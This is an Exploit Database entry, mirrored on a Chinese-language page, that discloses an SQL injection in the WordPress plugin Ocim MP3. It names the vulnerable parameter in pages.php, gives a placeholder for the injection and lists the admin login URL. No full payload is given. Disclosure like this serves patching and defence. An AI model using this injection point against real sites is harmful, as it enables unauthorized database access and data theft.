WordPress Plugin Ocim MP3 – SQL Injection

• Exploit Database
• 118 阅读

• 作者： xevil & Blankon33
  日期： 2016-02-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/39498/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33

  ======== Ocim MP3 Plugin SQL Injection Vulnerability ========   :----------------------------------------------------------------------------------------------------: : # Exploit Title : Ocim MP3 Plugin SQL Injection Vulnerability : # Date : 26 February 2016 : # Author : xevil and Blankon33 : # Vendor Site: http://www.ocimscripts.com/ : # Version: : # Vulnerability : SQL Injection : # Tested on : WordPress 4.4.2 : # Severity : High :----------------------------------------------------------------------------------------------------:   Summary ======== Ocim MP3 is Plugin to make MP3 Grabber site based on WordPress.   Proof of Concept ======== Infected URL: http://[Site]/[Path]/wp-content/plugins/ocim-mp3/source/pages.php?id=['SQLi]     Admin Panel: http://[Site]/[Path]/oc-login.php   =========== Thanks to =========== All Indonesian Hacker!!!